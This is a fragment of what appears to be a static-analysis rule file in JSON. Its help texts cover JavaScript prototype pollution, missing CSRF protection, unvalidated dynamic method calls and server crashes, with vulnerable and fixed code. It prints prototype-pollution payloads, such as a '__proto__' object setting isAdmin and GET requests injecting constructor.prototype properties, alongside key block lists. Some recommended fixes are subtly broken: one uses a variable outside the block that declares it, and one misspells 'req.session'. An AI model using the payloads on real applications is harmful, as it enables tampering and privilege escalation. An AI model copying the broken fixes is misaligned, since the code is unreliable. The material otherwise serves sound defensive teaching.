merge(dst[key], src[key]);\n        } else {\n            dst[key] = src[key];\n        }\n    }\n}\n\n```\nAlternatively, block the `__proto__` and `constructor` properties:\n\n\n```javascript\nfunction merge(dst, src) {\n    for (let key in src) {\n        if (!src.hasOwnProperty(key)) continue;\n        if (key === \"__proto__\" || key === \"constructor\") continue;\n        if (isObject(dst[key])) {\n            merge(dst[key], src[key]);\n        } else {\n            dst[key] = src[key];\n        }\n    }\n}\n\n```\n\n## References\n* Prototype pollution attacks: [lodash](https://hackerone.com/reports/380873), [jQuery](https://hackerone.com/reports/454365), [extend](https://hackerone.com/reports/381185), [just-extend](https://hackerone.com/reports/430291), [merge.recursive](https://hackerone.com/reports/381194).\n* Common Weakness Enumeration: [CWE-78](https://cwe.mitre.org/data/definitions/78.html).\n* Common Weakness Enumeration: [CWE-79](https://cwe.mitre.org/data/definitions/79.html).\n* Common Weakness Enumeration: [CWE-94](https://cwe.mitre.org/data/definitions/94.html).\n* Common Weakness Enumeration: [CWE-400](https://cwe.mitre.org/data/definitions/400.html).\n* Common Weakness Enumeration: [CWE-471](https://cwe.mitre.org/data/definitions/471.html).\n* Common Weakness Enumeration: [CWE-915](https://cwe.mitre.org/data/definitions/915.html).\n","markdown":"# Prototype-polluting function\nMost JavaScript objects inherit the properties of the built-in `Object.prototype` object. Prototype pollution is a type of vulnerability in which an attacker is able to modify `Object.prototype`. Since most objects inherit from the compromised `Object.prototype`, the attacker can use this to tamper with the application logic, and often escalate to remote code execution or cross-site scripting.\n\nOne way to cause prototype pollution is through use of an unsafe *merge* or *extend* function to recursively copy properties from one object to another, or through the use of a *deep assignment* function to assign to an unverified chain of property names. Such a function has the potential to modify any object reachable from the destination object, and the built-in `Object.prototype` is usually reachable through the special properties `__proto__` and `constructor.prototype`.\n\n\n## Recommendation\nThe most effective place to guard against this is in the function that performs the recursive copy or deep assignment.\n\nOnly merge or assign a property recursively when it is an own property of the *destination* object. Alternatively, block the property names `__proto__` and `constructor` from being merged or assigned to.\n\n\n## Example\nThis function recursively copies properties from `src` to `dst`:\n\n\n```javascript\nfunction merge(dst, src) {\n    for (let key in src) {\n        if (!src.hasOwnProperty(key)) continue;\n        if (isObject(dst[key])) {\n            merge(dst[key], src[key]);\n        } else {\n            dst[key] = src[key];\n        }\n    }\n}\n\n```\nHowever, if `src` is the object `{\"__proto__\": {\"isAdmin\": true}}`, it will inject the property `isAdmin: true` in `Object.prototype`.\n\nThe issue can be fixed by ensuring that only own properties of the destination object are merged recursively:\n\n\n```javascript\nfunction merge(dst, src) {\n    for (let key in src) {\n        if (!src.hasOwnProperty(key)) continue;\n        if (dst.hasOwnProperty(key) && isObject(dst[key])) {\n            merge(dst[key], src[key]);\n        } else {\n            dst[key] = src[key];\n        }\n    }\n}\n\n```\nAlternatively, block the `__proto__` and `constructor` properties:\n\n\n```javascript\nfunction merge(dst, src) {\n    for (let key in src) {\n        if (!src.hasOwnProperty(key)) continue;\n        if (key === \"__proto__\" || key === \"constructor\") continue;\n        if (isObject(dst[key])) {\n            merge(dst[key], src[key]);\n        } else {\n            dst[key] = src[key];\n        }\n    }\n}\n\n```\n\n## References\n* Prototype pollution attacks: [lodash](https://hackerone.com/reports/380873), [jQuery](https://hackerone.com/reports/454365), [extend](https://hackerone.com/reports/381185), [just-extend](https://hackerone.com/reports/430291), [merge.recursive](https://hackerone.com/reports/381194).\n* Common Weakness Enumeration: [CWE-78](https://cwe.mitre.org/data/definitions/78.html).\n* Common Weakness Enumeration: [CWE-79](https://cwe.mitre.org/data/definitions/79.html).\n* Common Weakness Enumeration: [CWE-94](https://cwe.mitre.org/data/definitions/94.html).\n* Common Weakness Enumeration: [CWE-400](https://cwe.mitre.org/data/definitions/400.html).\n* Common Weakness Enumeration: [CWE-471](https://cwe.mitre.org/data/definitions/471.html).\n* Common Weakness Enumeration: [CWE-915](https://cwe.mitre.org/data/definitions/915.html).\n"},"properties":{"tags":["security","external/cwe/cwe-078","external/cwe/cwe-079","external/cwe/cwe-094","external/cwe/cwe-400","external/cwe/cwe-471","external/cwe/cwe-915"],"description":"Functions recursively assigning properties on objects may be\n              the cause of accidental modification of a built-in prototype object.","id":"js/prototype-pollution-utility","kind":"path-problem","name":"Prototype-polluting function","precision":"high","problem.severity":"warning","security-severity":"6.1"}},{"id":"js/prototype-polluting-assignment","name":"js/prototype-polluting-assignment","shortDescription":{"text":"Prototype-polluting assignment"},"fullDescription":{"text":"Modifying an object obtained via a user-controlled property name may lead to accidental mutation of the built-in Object prototype, and possibly escalate to remote code execution or cross-site scripting."},"defaultConfiguration":{"enabled":true,"level":"warning"},"help":{"text":"# Prototype-polluting assignment\nMost JavaScript objects inherit the properties of the built-in `Object.prototype` object. Prototype pollution is a type of vulnerability in which an attacker is able to modify `Object.prototype`. Since most objects inherit from the compromised `Object.prototype` object, the attacker can use this to tamper with the application logic, and often escalate to remote code execution or cross-site scripting.\n\nOne way to cause prototype pollution is by modifying an object obtained via a user-controlled property name. Most objects have a special `__proto__` property that refers to `Object.prototype`. An attacker can abuse this special property to trick the application into performing unintended modifications of `Object.prototype`.\n\n\n## Recommendation\nUse an associative data structure that is resilient to untrusted key values, such as a [Map](https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/Map). In some cases, a prototype-less object created with [Object.create(null)](https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/Object/create) may be preferable.\n\nAlternatively, restrict the computed property name so it can't clash with a built-in property, either by prefixing it with a constant string, or by rejecting inputs that don't conform to the expected format.\n\n\n## Example\nIn the example below, the untrusted value `req.params.id` is used as the property name `req.session.todos[id]`. If a malicious user passes in the ID value `__proto__`, the variable `items` will then refer to `Object.prototype`. Finally, the modification of `items` then allows the attacker to inject arbitrary properties onto `Object.prototype`.\n\n\n```javascript\nlet express = require('express');\nlet app = express()\n\napp.put('/todos/:id', (req, res) => {\n    let id = req.params.id;\n    let items = req.session.todos[id];\n    if (!items) {\n        items = req.session.todos[id] = {};\n    }\n    items[req.query.name] = req.query.text;\n    res.end(200);\n});\n\n```\nOne way to fix this is to use [Map](https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/Map) objects to associate key/value pairs instead of regular objects, as shown below:\n\n\n```javascript\nlet express = require('express');\nlet app = express()\n\napp.put('/todos/:id', (req, res) => {\n    let id = req.params.id;\n    let items = req.session.todos.get(id);\n    if (!items) {\n        items = new Map();\n        req.sessions.todos.set(id, items);\n    }\n    items.set(req.query.name, req.query.text);\n    res.end(200);\n});\n\n```\nAnother way to fix it is to prevent the `__proto__` property from being used as a key, as shown below:\n\n\n```javascript\nlet express = require('express');\nlet app = express()\n\napp.put('/todos/:id', (req, res) => {\n    let id = req.params.id;\n    if (id === '__proto__' || id === 'constructor' || id === 'prototype') {\n        res.end(403);\n        return;\n    }\n    let items = req.session.todos[id];\n    if (!items) {\n        items = req.session.todos[id] = {};\n    }\n    items[req.query.name] = req.query.text;\n    res.end(200);\n});\n\n```\n\n## References\n* MDN: [Object.prototype.__proto__](https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/Object/proto)\n* MDN: [Map](https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/Map)\n* Common Weakness Enumeration: [CWE-78](https://cwe.mitre.org/data/definitions/78.html).\n* Common Weakness Enumeration: [CWE-79](https://cwe.mitre.org/data/definitions/79.html).\n* Common Weakness Enumeration: [CWE-94](https://cwe.mitre.org/data/definitions/94.html).\n* Common Weakness Enumeration: [CWE-400](https://cwe.mitre.org/data/definitions/400.html).\n* Common Weakness Enumeration: [CWE-471](https://cwe.mitre.org/data/definitions/471.html).\n* Common Weakness Enumeration: [CWE-915](https://cwe.mitre.org/data/definitions/915.html).\n","markdown":"# Prototype-polluting assignment\nMost JavaScript objects inherit the properties of the built-in `Object.prototype` object. Prototype pollution is a type of vulnerability in which an attacker is able to modify `Object.prototype`. Since most objects inherit from the compromised `Object.prototype` object, the attacker can use this to tamper with the application logic, and often escalate to remote code execution or cross-site scripting.\n\nOne way to cause prototype pollution is by modifying an object obtained via a user-controlled property name. Most objects have a special `__proto__` property that refers to `Object.prototype`. An attacker can abuse this special property to trick the application into performing unintended modifications of `Object.prototype`.\n\n\n## Recommendation\nUse an associative data structure that is resilient to untrusted key values, such as a [Map](https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/Map). In some cases, a prototype-less object created with [Object.create(null)](https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/Object/create) may be preferable.\n\nAlternatively, restrict the computed property name so it can't clash with a built-in property, either by prefixing it with a constant string, or by rejecting inputs that don't conform to the expected format.\n\n\n## Example\nIn the example below, the untrusted value `req.params.id` is used as the property name `req.session.todos[id]`. If a malicious user passes in the ID value `__proto__`, the variable `items` will then refer to `Object.prototype`. Finally, the modification of `items` then allows the attacker to inject arbitrary properties onto `Object.prototype`.\n\n\n```javascript\nlet express = require('express');\nlet app = express()\n\napp.put('/todos/:id', (req, res) => {\n    let id = req.params.id;\n    let items = req.session.todos[id];\n    if (!items) {\n        items = req.session.todos[id] = {};\n    }\n    items[req.query.name] = req.query.text;\n    res.end(200);\n});\n\n```\nOne way to fix this is to use [Map](https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/Map) objects to associate key/value pairs instead of regular objects, as shown below:\n\n\n```javascript\nlet express = require('express');\nlet app = express()\n\napp.put('/todos/:id', (req, res) => {\n    let id = req.params.id;\n    let items = req.session.todos.get(id);\n    if (!items) {\n        items = new Map();\n        req.sessions.todos.set(id, items);\n    }\n    items.set(req.query.name, req.query.text);\n    res.end(200);\n});\n\n```\nAnother way to fix it is to prevent the `__proto__` property from being used as a key, as shown below:\n\n\n```javascript\nlet express = require('express');\nlet app = express()\n\napp.put('/todos/:id', (req, res) => {\n    let id = req.params.id;\n    if (id === '__proto__' || id === 'constructor' || id === 'prototype') {\n        res.end(403);\n        return;\n    }\n    let items = req.session.todos[id];\n    if (!items) {\n        items = req.session.todos[id] = {};\n    }\n    items[req.query.name] = req.query.text;\n    res.end(200);\n});\n\n```\n\n## References\n* MDN: [Object.prototype.__proto__](https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/Object/proto)\n* MDN: [Map](https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/Map)\n* Common Weakness Enumeration: [CWE-78](https://cwe.mitre.org/data/definitions/78.html).\n* Common Weakness Enumeration: [CWE-79](https://cwe.mitre.org/data/definitions/79.html).\n* Common Weakness Enumeration: [CWE-94](https://cwe.mitre.org/data/definitions/94.html).\n* Common Weakness Enumeration: [CWE-400](https://cwe.mitre.org/data/definitions/400.html).\n* Common Weakness Enumeration: [CWE-471](https://cwe.mitre.org/data/definitions/471.html).\n* Common Weakness Enumeration: [CWE-915](https://cwe.mitre.org/data/definitions/915.html).\n"},"properties":{"tags":["security","external/cwe/cwe-078","external/cwe/cwe-079","external/cwe/cwe-094","external/cwe/cwe-400","external/cwe/cwe-471","external/cwe/cwe-915"],"description":"Modifying an object obtained via a user-controlled property name may\n              lead to accidental mutation of the built-in Object prototype,\n              and possibly escalate to remote code execution or cross-site scripting.","id":"js/prototype-polluting-assignment","kind":"path-problem","name":"Prototype-polluting assignment","precision":"high","problem.severity":"warning","security-severity":"6.1"}},{"id":"js/prototype-pollution","name":"js/prototype-pollution","shortDescription":{"text":"Prototype-polluting merge call"},"fullDescription":{"text":"Recursively merging a user-controlled object into another object can allow an attacker to modify the built-in Object prototype, and possibly escalate to remote code execution or cross-site scripting."},"defaultConfiguration":{"enabled":true,"level":"error"},"help":{"text":"# Prototype-polluting merge call\nMost JavaScript objects inherit the properties of the built-in `Object.prototype` object. Prototype pollution is a type of vulnerability in which an attacker is able to modify `Object.prototype`. Since most objects inherit from the compromised `Object.prototype`, the attacker can use this to tamper with the application logic, and often escalate to remote code execution or cross-site scripting.\n\nOne way to cause prototype pollution is through use of an unsafe *merge* or *extend* function to recursively copy properties from an untrusted source object. Such a call can modify any object reachable from the destination object, and the built-in `Object.prototype` is usually reachable through the special properties `__proto__` and `constructor.prototype`. An attacker can abuse this by sending an object with these property names and thereby modify `Object.prototype`.\n\n\n## Recommendation\nUpdate your library dependencies in order to use a safe version of the *merge* or *extend* function. If your library has no fixed version, switch to another library.\n\n\n## Example\nIn the example below, the untrusted value `req.query.prefs` is parsed as JSON and then copied into a new object:\n\n\n```javascript\napp.get('/news', (req, res) => {\n  let prefs = lodash.merge({}, JSON.parse(req.query.prefs));\n})\n\n```\nPrior to lodash 4.17.11 this would be vulnerable to prototype pollution. An attacker could send the following GET request:\n\n```\nGET /news?prefs={\"constructor\":{\"prototype\":{\"xxx\":true}}}\n```\nThis causes the `xxx` property to be injected on `Object.prototype`. Fix this by updating the lodash version:\n\n\n```json\n{\n  \"dependencies\": {\n    \"lodash\": \"^4.17.12\"\n  }\n}\n\n```\nNote that some web frameworks, such as Express, parse query parameters using extended URL-encoding by default. When this is the case, the application may be vulnerable even if not using `JSON.parse`. The example below would also be susceptible to prototype pollution:\n\n\n```javascript\napp.get('/news', (req, res) => {\n  let config = lodash.merge({}, {\n    prefs: req.query.prefs\n  });\n})\n\n```\nIn the above example, an attacker can cause prototype pollution by sending the following GET request:\n\n```\nGET /news?prefs[constructor][prototype][xxx]=true\n```\n\n## References\n* Prototype pollution attacks: [lodash](https://hackerone.com/reports/380873), [jQuery](https://hackerone.com/reports/454365), [extend](https://hackerone.com/reports/381185), [just-extend](https://hackerone.com/reports/430291), [merge.recursive](https://hackerone.com/reports/381194).\n* Express: [urlencoded()](https://expressjs.com/en/api.html#express.urlencoded)\n* Common Weakness Enumeration: [CWE-78](https://cwe.mitre.org/data/definitions/78.html).\n* Common Weakness Enumeration: [CWE-79](https://cwe.mitre.org/data/definitions/79.html).\n* Common Weakness Enumeration: [CWE-94](https://cwe.mitre.org/data/definitions/94.html).\n* Common Weakness Enumeration: [CWE-400](https://cwe.mitre.org/data/definitions/400.html).\n* Common Weakness Enumeration: [CWE-471](https://cwe.mitre.org/data/definitions/471.html).\n* Common Weakness Enumeration: [CWE-915](https://cwe.mitre.org/data/definitions/915.html).\n","markdown":"# Prototype-polluting merge call\nMost JavaScript objects inherit the properties of the built-in `Object.prototype` object. Prototype pollution is a type of vulnerability in which an attacker is able to modify `Object.prototype`. Since most objects inherit from the compromised `Object.prototype`, the attacker can use this to tamper with the application logic, and often escalate to remote code execution or cross-site scripting.\n\nOne way to cause prototype pollution is through use of an unsafe *merge* or *extend* function to recursively copy properties from an untrusted source object. Such a call can modify any object reachable from the destination object, and the built-in `Object.prototype` is usually reachable through the special properties `__proto__` and `constructor.prototype`. An attacker can abuse this by sending an object with these property names and thereby modify `Object.prototype`.\n\n\n## Recommendation\nUpdate your library dependencies in order to use a safe version of the *merge* or *extend* function. If your library has no fixed version, switch to another library.\n\n\n## Example\nIn the example below, the untrusted value `req.query.prefs` is parsed as JSON and then copied into a new object:\n\n\n```javascript\napp.get('/news', (req, res) => {\n  let prefs = lodash.merge({}, JSON.parse(req.query.prefs));\n})\n\n```\nPrior to lodash 4.17.11 this would be vulnerable to prototype pollution. An attacker could send the following GET request:\n\n```\nGET /news?prefs={\"constructor\":{\"prototype\":{\"xxx\":true}}}\n```\nThis causes the `xxx` property to be injected on `Object.prototype`. Fix this by updating the lodash version:\n\n\n```json\n{\n  \"dependencies\": {\n    \"lodash\": \"^4.17.12\"\n  }\n}\n\n```\nNote that some web frameworks, such as Express, parse query parameters using extended URL-encoding by default. When this is the case, the application may be vulnerable even if not using `JSON.parse`. The example below would also be susceptible to prototype pollution:\n\n\n```javascript\napp.get('/news', (req, res) => {\n  let config = lodash.merge({}, {\n    prefs: req.query.prefs\n  });\n})\n\n```\nIn the above example, an attacker can cause prototype pollution by sending the following GET request:\n\n```\nGET /news?prefs[constructor][prototype][xxx]=true\n```\n\n## References\n* Prototype pollution attacks: [lodash](https://hackerone.com/reports/380873), [jQuery](https://hackerone.com/reports/454365), [extend](https://hackerone.com/reports/381185), [just-extend](https://hackerone.com/reports/430291), [merge.recursive](https://hackerone.com/reports/381194).\n* Express: [urlencoded()](https://expressjs.com/en/api.html#express.urlencoded)\n* Common Weakness Enumeration: [CWE-78](https://cwe.mitre.org/data/definitions/78.html).\n* Common Weakness Enumeration: [CWE-79](https://cwe.mitre.org/data/definitions/79.html).\n* Common Weakness Enumeration: [CWE-94](https://cwe.mitre.org/data/definitions/94.html).\n* Common Weakness Enumeration: [CWE-400](https://cwe.mitre.org/data/definitions/400.html).\n* Common Weakness Enumeration: [CWE-471](https://cwe.mitre.org/data/definitions/471.html).\n* Common Weakness Enumeration: [CWE-915](https://cwe.mitre.org/data/definitions/915.html).\n"},"properties":{"tags":["security","external/cwe/cwe-078","external/cwe/cwe-079","external/cwe/cwe-094","external/cwe/cwe-400","external/cwe/cwe-471","external/cwe/cwe-915"],"description":"Recursively merging a user-controlled object into another object\n              can allow an attacker to modify the built-in Object prototype,\n              and possibly escalate to remote code execution or cross-site scripting.","id":"js/prototype-pollution","kind":"path-problem","name":"Prototype-polluting merge call","precision":"high","problem.severity":"error","security-severity":"6.1"}},{"id":"js/missing-token-validation","name":"js/missing-token-validation","shortDescription":{"text":"Missing CSRF middleware"},"fullDescription":{"text":"Using cookies without CSRF protection may allow malicious websites to submit requests on behalf of the user."},"defaultConfiguration":{"enabled":true,"level":"error"},"help":{"text":"# Missing CSRF middleware\nWebsites that rely on cookie-based authentication may be vulnerable to cross-site request forgery (CSRF). Specifically, a state-changing request should include a secret token so the request can't be forged by an attacker. Otherwise, unwanted requests can be submitted on behalf of a user who visits a malicious website.\n\nThis is typically mitigated by embedding a session-specific secret token in each request. This token is then checked as an additional authentication measure. A malicious website should have no way of guessing the correct token to embed in the request.\n\n\n## Recommendation\nUse a middleware package such as `lusca.csrf` to protect against CSRF attacks.\n\n\n## Example\nIn the example below, the server authenticates users before performing the `changeEmail` POST action:\n\n\n```javascript\nconst app = require(\"express\")(),\n  cookieParser = require(\"cookie-parser\"),\n  bodyParser = require(\"body-parser\"),\n  session = require(\"express-session\");\n\napp.use(cookieParser());\napp.use(bodyParser.urlencoded({ extended: false }));\napp.use(session({ secret: process.env['SECRET'], cookie: { maxAge: 60000 } }));\n\n// ...\n\napp.post(\"/changeEmail\", function(req, res) {\n  const userId = req.session.id;\n  const email = req.body[\"email\"];\n  // ... update email associated with userId\n});\n\n```\nThis is not secure. An attacker can submit a POST `changeEmail` request on behalf of a user who visited a malicious website. Since authentication happens without any action from the user, the `changeEmail` action would be executed, despite not being initiated by the user.\n\nThis vulnerability can be mitigated by installing a CSRF protecting middleware handler:\n\n\n```javascript\nconst app = require(\"express\")(),\n  cookieParser = require(\"cookie-parser\"),\n  bodyParser = require(\"body-parser\"),\n  session = require(\"express-session\"),\n  csrf = require('lusca').csrf;\n\napp.use(cookieParser());\napp.use(bodyParser.urlencoded({ extended: false }));\napp.use(session({ secret: process.env['SECRET'], cookie: { maxAge: 60000 } }));\napp.use(csrf());\n\n// ...\n\napp.post(\"/changeEmail\", function(req, res) {\n  const userId = req.session.id;\n  const email = req.body[\"email\"];\n  // ... update email associated with userId\n});\n\n```\n\n## References\n* OWASP: [Cross-Site Request Forgery (CSRF)](https://www.owasp.org/index.php/Cross-Site_Request_Forgery_(CSRF))\n* NPM: [lusca](https://www.npmjs.com/package/lusca)\n* Common Weakness Enumeration: [CWE-352](https://cwe.mitre.org/data/definitions/352.html).\n","markdown":"# Missing CSRF middleware\nWebsites that rely on cookie-based authentication may be vulnerable to cross-site request forgery (CSRF). Specifically, a state-changing request should include a secret token so the request can't be forged by an attacker. Otherwise, unwanted requests can be submitted on behalf of a user who visits a malicious website.\n\nThis is typically mitigated by embedding a session-specific secret token in each request. This token is then checked as an additional authentication measure. A malicious website should have no way of guessing the correct token to embed in the request.\n\n\n## Recommendation\nUse a middleware package such as `lusca.csrf` to protect against CSRF attacks.\n\n\n## Example\nIn the example below, the server authenticates users before performing the `changeEmail` POST action:\n\n\n```javascript\nconst app = require(\"express\")(),\n  cookieParser = require(\"cookie-parser\"),\n  bodyParser = require(\"body-parser\"),\n  session = require(\"express-session\");\n\napp.use(cookieParser());\napp.use(bodyParser.urlencoded({ extended: false }));\napp.use(session({ secret: process.env['SECRET'], cookie: { maxAge: 60000 } }));\n\n// ...\n\napp.post(\"/changeEmail\", function(req, res) {\n  const userId = req.session.id;\n  const email = req.body[\"email\"];\n  // ... update email associated with userId\n});\n\n```\nThis is not secure. An attacker can submit a POST `changeEmail` request on behalf of a user who visited a malicious website. Since authentication happens without any action from the user, the `changeEmail` action would be executed, despite not being initiated by the user.\n\nThis vulnerability can be mitigated by installing a CSRF protecting middleware handler:\n\n\n```javascript\nconst app = require(\"express\")(),\n  cookieParser = require(\"cookie-parser\"),\n  bodyParser = require(\"body-parser\"),\n  session = require(\"express-session\"),\n  csrf = require('lusca').csrf;\n\napp.use(cookieParser());\napp.use(bodyParser.urlencoded({ extended: false }));\napp.use(session({ secret: process.env['SECRET'], cookie: { maxAge: 60000 } }));\napp.use(csrf());\n\n// ...\n\napp.post(\"/changeEmail\", function(req, res) {\n  const userId = req.session.id;\n  const email = req.body[\"email\"];\n  // ... update email associated with userId\n});\n\n```\n\n## References\n* OWASP: [Cross-Site Request Forgery (CSRF)](https://www.owasp.org/index.php/Cross-Site_Request_Forgery_(CSRF))\n* NPM: [lusca](https://www.npmjs.com/package/lusca)\n* Common Weakness Enumeration: [CWE-352](https://cwe.mitre.org/data/definitions/352.html).\n"},"properties":{"tags":["security","external/cwe/cwe-352"],"description":"Using cookies without CSRF protection may allow malicious websites to\n              submit requests on behalf of the user.","id":"js/missing-token-validation","kind":"problem","name":"Missing CSRF middleware","precision":"high","problem.severity":"error","security-severity":"8.8"}},{"id":"js/unvalidated-dynamic-method-call","name":"js/unvalidated-dynamic-method-call","shortDescription":{"text":"Unvalidated dynamic method call"},"fullDescription":{"text":"Calling a method with a user-controlled name may dispatch to an unexpected target, which could cause an exception."},"defaultConfiguration":{"enabled":true,"level":"warning"},"help":{"text":"# Unvalidated dynamic method call\nJavaScript makes it easy to look up object properties dynamically at runtime. In particular, methods can be looked up by name and then called. However, if the method name is user-controlled, an attacker could choose a name that makes the application invoke an unexpected method, which may cause a runtime exception. If this exception is not handled, it could be used to mount a denial-of-service attack.\n\nFor example, there might not be a method of the given name, or the result of the lookup might not be a function. In either case the method call will throw a `TypeError` at runtime.\n\nAnother, more subtle example is where the result of the lookup is a standard library method from `Object.prototype`, which most objects have on their prototype chain. Examples of such methods include `valueOf`, `hasOwnProperty` and `__defineSetter__`. If the method call passes the wrong number or kind of arguments to these methods, they will throw an exception.\n\n\n## Recommendation\nIt is best to avoid dynamic method lookup involving user-controlled names altogether, for instance by using a `Map` instead of a plain object.\n\nIf the dynamic method lookup cannot be avoided, consider whitelisting permitted method names. At the very least, check that the method is an own property and not inherited from the prototype object. If the object on which the method is looked up contains properties that are not methods, you should additionally check that the result of the lookup is a function. Even if the object only contains methods, it is still a good idea to perform this check in case other properties are added to the object later on.\n\n\n## Example\nIn the following example, an HTTP request parameter `action` property is used to dynamically look up a function in the `actions` map, which is then invoked with the `payload` parameter as its argument.\n\n\n```javascript\nvar express = require('express');\nvar app = express();\n\nvar actions = {\n  play(data) {\n    // ...\n  },\n  pause(data) {\n    // ...\n  }\n}\n\napp.get('/perform/:action/:payload', function(req, res) {\n  let action = actions[req.params.action];\n  // BAD: `action` may not be a function\n  res.end(action(req.params.payload));\n});\n\n```\nThe intention is to allow clients to invoke the `play` or `pause` method, but there is no check that `action` is actually the name of a method stored in `actions`. If, for example, `action` is `rewind`, `action` will be `undefined` and the call will result in a runtime error.\n\nThe easiest way to prevent this is to turn `actions` into a `Map` and using `Map.prototype.has` to check whether the method name is valid before looking it up.\n\n\n```javascript\nvar express = require('express');\nvar app = express();\n\nvar actions = new Map();\nactions.set(\"play\", function play(data) {\n  // ...\n});\nactions.set(\"pause\", function pause(data) {\n  // ...\n});\n\napp.get('/perform/:action/:payload', function(req, res) {\n  if (actions.has(req.params.action)) {\n    if (typeof actions.get(req.params.action) === 'function'){\n      let action = actions.get(req.params.action);\n    }\n    // GOOD: `action` is either the `play` or the `pause` function from above\n    res.end(action(req.params.payload));\n  } else {\n    res.end(\"Unsupported action.\");\n  }\n});\n\n```\nIf `actions` cannot be turned into a `Map`, a `hasOwnProperty` check should be added to validate the method name:\n\n\n```javascript\nvar express = require('express');\nvar app = express();\n\nvar actions = {\n  play(data) {\n    // ...\n  },\n  pause(data) {\n    // ...\n  }\n}\n\napp.get('/perform/:action/:payload', function(req, res) {\n  if (actions.hasOwnProperty(req.params.action)) {\n    let action = actions[req.params.action];\n    if (typeof action === 'function') {\n      // GOOD: `action` is an own method of `actions`\n      res.end(action(req.params.payload));\n      return;\n    }\n  }\n  res.end(\"Unsupported action.\");\n});\n\n```\n\n## References\n* OWASP: [Denial of Service](https://www.owasp.org/index.php/Denial_of_Service).\n* MDN: [Map](https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/Map).\n* MDN: [Object.prototype](https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/Object/prototype).\n* Common Weakness Enumeration: [CWE-754](https://cwe.mitre.org/data/definitions/754.html).\n","markdown":"# Unvalidated dynamic method call\nJavaScript makes it easy to look up object properties dynamically at runtime. In particular, methods can be looked up by name and then called. However, if the method name is user-controlled, an attacker could choose a name that makes the application invoke an unexpected method, which may cause a runtime exception. If this exception is not handled, it could be used to mount a denial-of-service attack.\n\nFor example, there might not be a method of the given name, or the result of the lookup might not be a function. In either case the method call will throw a `TypeError` at runtime.\n\nAnother, more subtle example is where the result of the lookup is a standard library method from `Object.prototype`, which most objects have on their prototype chain. Examples of such methods include `valueOf`, `hasOwnProperty` and `__defineSetter__`. If the method call passes the wrong number or kind of arguments to these methods, they will throw an exception.\n\n\n## Recommendation\nIt is best to avoid dynamic method lookup involving user-controlled names altogether, for instance by using a `Map` instead of a plain object.\n\nIf the dynamic method lookup cannot be avoided, consider whitelisting permitted method names. At the very least, check that the method is an own property and not inherited from the prototype object. If the object on which the method is looked up contains properties that are not methods, you should additionally check that the result of the lookup is a function. Even if the object only contains methods, it is still a good idea to perform this check in case other properties are added to the object later on.\n\n\n## Example\nIn the following example, an HTTP request parameter `action` property is used to dynamically look up a function in the `actions` map, which is then invoked with the `payload` parameter as its argument.\n\n\n```javascript\nvar express = require('express');\nvar app = express();\n\nvar actions = {\n  play(data) {\n    // ...\n  },\n  pause(data) {\n    // ...\n  }\n}\n\napp.get('/perform/:action/:payload', function(req, res) {\n  let action = actions[req.params.action];\n  // BAD: `action` may not be a function\n  res.end(action(req.params.payload));\n});\n\n```\nThe intention is to allow clients to invoke the `play` or `pause` method, but there is no check that `action` is actually the name of a method stored in `actions`. If, for example, `action` is `rewind`, `action` will be `undefined` and the call will result in a runtime error.\n\nThe easiest way to prevent this is to turn `actions` into a `Map` and using `Map.prototype.has` to check whether the method name is valid before looking it up.\n\n\n```javascript\nvar express = require('express');\nvar app = express();\n\nvar actions = new Map();\nactions.set(\"play\", function play(data) {\n  // ...\n});\nactions.set(\"pause\", function pause(data) {\n  // ...\n});\n\napp.get('/perform/:action/:payload', function(req, res) {\n  if (actions.has(req.params.action)) {\n    if (typeof actions.get(req.params.action) === 'function'){\n      let action = actions.get(req.params.action);\n    }\n    // GOOD: `action` is either the `play` or the `pause` function from above\n    res.end(action(req.params.payload));\n  } else {\n    res.end(\"Unsupported action.\");\n  }\n});\n\n```\nIf `actions` cannot be turned into a `Map`, a `hasOwnProperty` check should be added to validate the method name:\n\n\n```javascript\nvar express = require('express');\nvar app = express();\n\nvar actions = {\n  play(data) {\n    // ...\n  },\n  pause(data) {\n    // ...\n  }\n}\n\napp.get('/perform/:action/:payload', function(req, res) {\n  if (actions.hasOwnProperty(req.params.action)) {\n    let action = actions[req.params.action];\n    if (typeof action === 'function') {\n      // GOOD: `action` is an own method of `actions`\n      res.end(action(req.params.payload));\n      return;\n    }\n  }\n  res.end(\"Unsupported action.\");\n});\n\n```\n\n## References\n* OWASP: [Denial of Service](https://www.owasp.org/index.php/Denial_of_Service).\n* MDN: [Map](https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/Map).\n* MDN: [Object.prototype](https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/Object/prototype).\n* Common Weakness Enumeration: [CWE-754](https://cwe.mitre.org/data/definitions/754.html).\n"},"properties":{"tags":["security","external/cwe/cwe-754"],"description":"Calling a method with a user-controlled name may dispatch to\n              an unexpected target, which could cause an exception.","id":"js/unvalidated-dynamic-method-call","kind":"path-problem","name":"Unvalidated dynamic method call","precision":"high","problem.severity":"warning","security-severity":"7.5"}},{"id":"js/server-crash","name":"js/server-crash","shortDescription":{"text":"Server crash"},"fullDescription":{"text":"A server that can be forced to crash may be vulnerable to denial-of-service attacks."},"defaultConfiguration":{"enabled":true,"level":"warning"},"help":{"text":"# Server crash\nServers handle requests from clients until terminated deliberately by a server administrator. A client request that results in an uncaught server-side exception causes the current server response generation to fail, and should not have an effect on subsequent client requests.\n\nUnder some circumstances, uncaught exceptions can however cause the entire server to terminate abruptly. Such a behavior is highly undesirable, especially if it gives malicious users the ability to turn off the server at will, which is an efficient denial-of-service attack.\n\n\n## Recommendation\nEnsure that the processing of client requests can not cause uncaught exceptions to terminate the entire server abruptly.\n\n\n## Example\nThe following server code checks if a client-provided file path is valid before saving data to that path. It would be reasonable to expect that the server responds with an error in case the request contains an invalid file path. However, the server instead throws an exception, which is uncaught in the context of the asynchronous callback invocation (`fs.access(...)`). 